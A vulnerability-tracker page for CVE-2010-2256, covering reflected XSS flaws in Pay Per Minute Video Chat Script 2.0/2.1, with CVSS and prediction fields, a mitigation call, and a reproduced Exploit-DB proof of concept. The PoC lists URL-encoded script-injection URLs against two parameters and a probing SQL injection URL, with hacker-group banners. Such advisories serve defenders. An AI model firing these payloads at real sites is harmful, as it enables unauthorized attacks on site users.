CVE-2010-2256

medium

Published 2010-06-09 · Modified 2026-04-29

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in Pay Per Minute Video Chat Script 2.0 and 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/memberviewdetails.php and the (2) model parameter to videos.php.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-10983 webapps php verified text · 2 KB

R3d-D3V!L · 2010-01-04

Pay Per Minute Video Chat Script 2.0/2.1 - Multiple Vulnerabilities

text exploit Source: Exploit-DB

[?] ?????????????????????????{In The Name Of Allah The Mercifull}??????????????????????
[?]
[~] Tybe: suffer from multi XSS Vulnerability
[~] Vendor: payperviewvideosoftware.com
[?] Software : Pay Per Minute Video Chat Script V 2.1
[-] pR!CE : $269.00 USD.
[?] author: ((R3d-D3v!L))
[?] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY
[?] contact: N/A
[-]
[?] Date: 4.Jan.2010
[?] T!ME: 07:15 pm GMT
[?] Home: WwW.xP10.ME
[?]
[?]
[-]??????????????????????{DEV!L'5 of SYST3M}??????????????????

XSS:

[*] Err0r C0N50L3:

http://server/P47H/admin/memberviewdetails.php?id=
http://server/P47H/videos.php?model=

[~] {EV!L EXPLO!T}:


//server/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E

http://server/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E


SQL Injection:

[*] Err0r C0N50L3:

http://server/P47H/index_ie.php?page=-666

[~] {EV!L EXPLO!T}:

n07 ALL0w AT Th!S T!ME

N073:

REAL RED DEV!L W@S h3r3 LAMERZ


GAZA !N our hearts !


[~]-----------------------------{((Angela Bennett))}---------------------------------------


[~] Greetz tO: dolly & L!TTLE 547r & 0r45hy & DEV!L_MODY & po!S!ON Sc0rp!0N & mAG0ush_1987

[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ

[~] spechial thanks : ab0 mohammed & XP_10 h4CK3R & JASM!N & c0prA & MARWA & N0RHAN & S4R4

[?]spechial SupP0RT: MY M!ND ;) & dookie2000ca &((OFFsec))

[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t))

[~]spechial FR!ND: 74M3M

[~] !'M 4R48!4N 3XPL0!73R.

[~]{[(D!R 4ll 0R D!E)]};

[~]---------------------------------------------------------------------------------------------

Application impact

Vendor	Product	Versions	Fixed
payperviewvideosoftware	pay_per_minute_video_chat_script	`2.0`
payperviewvideosoftware	pay_per_minute_video_chat_script	`2.1`

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.